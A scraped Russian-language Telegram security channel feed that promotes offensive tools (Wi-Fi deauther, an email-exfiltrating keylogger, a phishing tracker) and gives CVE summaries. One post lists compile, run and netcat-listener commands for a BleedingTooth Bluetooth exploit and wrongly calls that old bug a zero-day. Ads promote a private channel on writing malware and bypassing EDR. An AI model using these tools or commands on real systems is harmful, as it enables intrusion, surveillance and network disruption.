5.26K subscribers
219 photos
33 videos
129 files
857 links
Бот для обращений: @itinfobez_bot
Реклама / сотрудничество: @itinfobez_bot

YouTube:
https://www.youtube.com/channel/UCSESPWvIonIpee3Oa5wUcJA
Download Telegram
Esp8266_deauther — это популярный и широко известный проект с открытым исходным кодом, использующий модуль ESP8266 Wi-Fi для выполнения атак деаутентификации (deauthentication attacks) на Wi-Fi сетях.

С её помощью устройство может сканировать сети и точки доступа, производить атаки на сети и отключать от них клиентов.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#WiFi #Attack #Deauth #Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥121
🔒 ЗАКРЫТЫЙ КАНАЛ Security [private] 🔒

🔄 ЧТО ВАС ЖДЁТ ВНУТРИ ? 🔄
CTF-разборы с нуля: От простых тасков до OSCP-уровня
Создание Bредоносного программного обеспечения / Malware: Реверс-инжиниринг, антидетект, эксплуатация уязвимостей (только для исследований!)
CVE Deep Dive: Анализ свежих 0-day уязвимостей + PoC-код
Эксклюзивные гайды: Методы обхода EDR, криптография в Red Team операциях
Разбор CTF-задач: Погружение в реальные кейсы из соревнований по информационной безопасности.
Детальный анализ вредоносных программ: Исследуем сложные и самописные вирусы, трояны, ransomware. Узнайте, как они обходят защиту и как их обезвреживать.
Создание вредоносного ПО (ВПО) для тестирования: Образовательные примеры написания malware с нуля (в образовательных целях).
Эксклюзивные материалы: Обзоры новых угроз, техники APT-групп, методы reverse engineering.

Что вы получаете приобретая подписку ?
🔥 Самописные вредоносные программы. Научитесь распознавать и бороться с уникальными угрозами, которые не ловит антивирус.
🔥 Практико-ориентированный подход: Не теория, а реальные сценарии для прокачки ваших навыков.
🔥 Закрытое сообщество: Публикация контента только по теме канала. Без спама, только профессиональный контент.

⚠️ ВНИМАНИЕ🤕:
Весь контент — для образовательных целей. Автор не несет ответственности за незаконное использование.

🎃 Вступить в закрытый канал 🎃

💻 Поддержка 💻
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💔4
🔗 SQL Squid Game 🔗

Бесплатная обучающая игра по SQL вдохновленная сериалом «Игра в кальмара». Всего 9 тематических уровней, в каждом из которых спрятана задача. Ошиблись — придется начинать заново. С каждым уровнем задания становятся всё сложнее, но везде даётся по 2 подсказки.

Если навыков не хватает или хотите выучить SQL с нуля, то есть 33 бесплатных урока, чтобы подтянуть знания.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#sql #game
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12💔3
Wave - терминал с открытым исходным кодом, который сочетает в себе традиционные возможности терминала с графическими возможностями, такими как предварительный просмотр файлов, веб-браузинг и помощь ИИ. Он работает на MacOS, Linux и Windows.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
🐱 Keylogger — простой кейлоггер на Python 🐱

Отправляет на почту захваченные нажатия:
Клавиатура
Мышь
микрофон

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#Keylogger #Python #OpenSource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
Forwarded from Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:
 $ gcc -o exploit BleedingTooth.c -lbluetooth


Запуск:
 $ sudo ./exploit MAC-адрес атакуемого устройства


В другом терминале выполнить:
 $ nc -lvp 1337



При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator


Успешность: ~80% для целевой версии ядра.

Ограничения:
Bluetooth должен быть активен и доступен для подключения.
SELinux/AppArmor могут блокировать выполнение кода.
Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
CVE-2025-49144 — это уязвимость с высоким уровнем риска, связанная с повышением локальных привилегий, обнаруженная в установщиках Notepad++ версии 8.8.1 и более ранних версий. Эта уязвимость возникает из-за неконтролируемого поведения пути поиска исполняемых файлов во время установки, что позволяет локальному злоумышленнику получить привилегии системного уровня, поместив вредоносные исполняемые файлы в тот же каталог, что и установщик.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#CVE #Windows #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10💔1
WebVM — это проект, реализующий виртуальную машину, способную запускать операционные системы и программы внутри веб-браузера.

Это позволяет создавать полностью автономные среды для тестирования, обучения и разработки без необходимости установки дополнительного ПО.


Поддерживает множество архитектур и операционных систем, предоставляя удобный способ работать с ними онлайн.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉
Подписаться 👈

#Web #OpenSource #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥91
CVE-2025-47812 — это серьёзная проблема, вызванная многочисленными недостатками в системе аутентификации пользователей и управления сеансами Wing FTP Server.

Эта уязвимость особенно опасна, поскольку Wing FTP Server часто работает с привилегиями root в Linux или привилегиями SYSTEM в Windows по умолчанию. Такая конфигурация по умолчанию даёт злоумышленникам максимальный контроль над взломанной системой в случае успешной эксплуатации.

Затронутые версии: уязвимы версии Wing FTP Server до 7.4.4.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥101💔1
Kingfisher — это инструмент, разработанный для анализа и валидации конфигураций MongoDB, помогающий выявлять потенциальные проблемы безопасности, производительности и соответствия лучшим практикам.

Он сканирует конфигурационные файлы MongoDB, выявляет отклонения от рекомендуемых настроек и генерирует отчеты с рекомендациями по улучшению конфигурации.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#MongoDB #DB
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
Trape — это инструмент для отслеживания и профилирования людей в интернете, использующий методы социальной инженерии и OSINT.

Он позволяет создавать реалистичные фишинговые кампании, собирать информацию о пользователях, включая их IP-адреса, геолокацию, используемое устройство, браузер и другие данные.


Trape предназначен для тестирования на проникновение и оценки рисков, связанных с социальной инженерией.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥113
This media is not supported in your browser
VIEW IN TELEGRAM
↔️ XSSTRON - браузер на основе Chromium для поиска XSS

Просматривайте веб-страницы, и браузер автоматически проверит их на наличие уязвимостей Reflected, Stored и DOM XSS в фоновом режиме. Также поддерживает POST запросы.

При нахождении уязвимости, отобразит ее в новом окне вместе с примером эксплуатации.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥113
🔥Evil Foca — инструмент для проверок различных сетевых атак в сетях IPv4 и IPv6.

Сканирует локальную сеть, идентифицируя устройства, маршрутизаторы и их сетевые интерфейсы, после чего можно совершать различные атаки на участников сети.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#scan
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Nautilus — официальный файловый менеджер для рабочей среды GNOME. В названии присутствует игра слов, связанная с изображением раковины моллюска наутилуса для представления оболочки операционной системы (англ. shell — это и раковина, и оболочка ОС). 

Nautilus заменил Midnight Commander в GNOME 1.4 и стал файловым менеджером по умолчанию начиная с версии 2.0.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥121
Raspirus — это сканер вредоносного программного обеспечения, разработанный с акцентом на простоту использования и минимальное потребление ресурсов, работающий на основе настраиваемых правил.

Он позволяет обнаруживать вредоносное ПО на различных платформах, используя базу правил, определяющих известные вредоносные программы и подозрительное поведение.

Купить книгу по пентесту для начинающих можно
тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#Scan #Malware
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
↔️ Причины критической важности SCADA ↔️

Системы SCADA (диспетчерского управления и сбора данных) являются одними из важнейших компонентов на любых производствах, так как они позволяют контролировать промышленные процессы.

Ввиду обширного разнообразия подобных систем, сбои в них могут повлечь за собой различные последствия, не говоря о ситуациях, когда в игру вступают недоброжелатели. В зависимости от вида атаки, условий её реализации, целей злоумышленников и компетенций персонала, всё может закончиться простым похищением данных (которые впоследствии злоумышленники используют для шантажа, дискредитации или перепродажи). Но совсем иначе обстоит вопрос, если целью вредителей является диверсия, ведь в подобном случае, здоровью людей и окружающей среде грозит серьезная опасность. Именно поэтому сохранение контроля над системами SCADA является важнейшей задачей для любого промышленного предприятия.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#scada
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥91
CVE-2025-3248 новая уязмостью в Langflow которую активно эксплуатируют


Langflow — популярный Python-фреймворк для создания AI-приложений, который используют разработчики по всему миру. Но есть нюанс — критическая уязвимость с CVSS 9.8, которую уже активно эксплуатируют для развертывания ботнета Flodrix.

➡️ Технические детали
➡️Тип уязвимости: Неаутентифицированное удаленное выполнение кода (RCE)
➡️Затронутые версии: Langflow до версии 1.3.0
➡️Вектор атаки: POST-запросы к эндпоинту /api/v1/validate/code
➡️Механизм: Недостаточная валидация входных данных при компиляции Python-кода

➡️ Процесс эксплуатации
1. Сбор IP-адресов публично доступных серверов Langflow через Shodan/FOFA
2. Использование публичного PoC для получения удаленного доступа
3. Выполнение разведывательных команд (whoami, printenv, cat /root/.bash_history)
4. Загрузка и установка ботнета Flodrix
5. Установка связи с C&C сервером для координации DDoS-атак

➡️ Последствия
➡️Полная компрометация системы
➡️Участие в DDoS-атаках
➡️Потенциальная утечка чувствительных данных и конфигураций

➡️ Что делать
Если используете Langflow — немедленно обновляйтесь до версии 1.3.0 или выше. Проверьте логи на предмет подозрительных POST-запросов к /api/v1/validate/code. И да, если ваш сервер был скомпрометирован — полная переустановка системы, никаких полумер.
Ботнет Flodrix уже показал себя как серьезная угроза, так что не тяните с патчингом. Особенно если ваши AI-приложения доступны из интернета.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10